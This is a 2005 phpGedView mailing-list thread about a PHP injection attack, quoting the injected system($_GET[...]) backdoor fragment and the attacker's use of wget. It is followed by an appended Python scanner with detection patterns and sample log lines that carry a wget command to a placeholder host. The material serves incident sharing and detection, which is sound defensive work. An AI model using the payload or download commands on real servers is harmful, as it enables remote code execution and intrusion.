Re: [Phpgedview-talk] attack attempt
From: Heike El-A. - T. <hei...@ya...> - 2005-12-20 20:20:56
Thanks for the info. As my PC is not linux-operated I assume no harm was done. Checked my phpGedView-log and saw that the hacker failed to log in. Uploaded the patch anyway.

Heike

Matthew Gates <ma...@po...> wrote:

wget is a command line tool for downloading web pages. You can use it for mirroring pages (making local copies of pages) and all sorts. It's a very useful little tool, and is commonly installed on unix-like operating systems. In this case the attacker is trying to use it to download some program (to do something - who knows what, but I bet it's not friendly).

On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates wrote:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
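
The "grep your logs for wget" check from the thread, as an added example that is not part of the original messages or of phpGedView: it percent-decodes each request before matching, which a plain grep does not, and also looks for the `suntzu` parameter and the injected PHP fragment quoted above. It goes slightly beyond the thread by matching other download tools as well. Assumptions: Apache combined log format; the sample lines, paths and hosts are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Assumption: Apache "combined" access log format; adjust for other servers.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Indicators taken from the thread: the injected PHP fragment, its "suntzu"
# parameter, and a download command handed to it.
INDICATORS = {
    "php_injection": re.compile(r"system\s*\(\s*\$_(GET|POST|REQUEST)|error_reporting\s*\(\s*0\s*\)", re.I),
    "backdoor_param": re.compile(r"[?&]suntzu=", re.I),
    "download_cmd": re.compile(r"\b(wget|curl|fetch)\b", re.I),
}

def decode(request, rounds=2):
    """Percent-decode up to `rounds` times so double encoding is also covered."""
    for _ in range(rounds):
        decoded = unquote_plus(request)
        if decoded == request:
            break
        request = decoded
    return request

def scan(lines):
    """Return (ip, timestamp, status, indicator names) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        req = decode(m.group("req"))
        names = sorted(n for n, rx in INDICATORS.items() if rx.search(req))
        if names:
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), names))
    return hits

# Constructed sample lines, not taken from anyone's real logs. Note that data
# sent in a POST body never reaches the access log; only the URL is recorded.
SAMPLE = [
    '192.0.2.10 - - [20/Dec/2005:19:40:01 +0000] "GET /pgv/PLACEHOLDER.php?suntzu=wget%20http://example.invalid/a HTTP/1.0" 200 512 "-" "-"',
    '192.0.2.10 - - [20/Dec/2005:19:39:12 +0000] "GET /pgv/PLACEHOLDER.php?FIELD=%5C%27;error_reporting(0);if(isset($suntzu))%7Bsystem($_GET%5Bsuntzu%5D);%7D HTTP/1.0" 200 900 "-" "-"',
    '198.51.100.7 - - [20/Dec/2005:19:41:30 +0000] "GET /pgv/PLACEHOLDER.php?page=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Dec/2005:19:42:02 +0000] "GET /pgv/PLACEHOLDER.php?suntzu=%2577get HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with status 200 on the `suntzu` parameter deserves a closer look than a 404, since it means the requested script exists and answered.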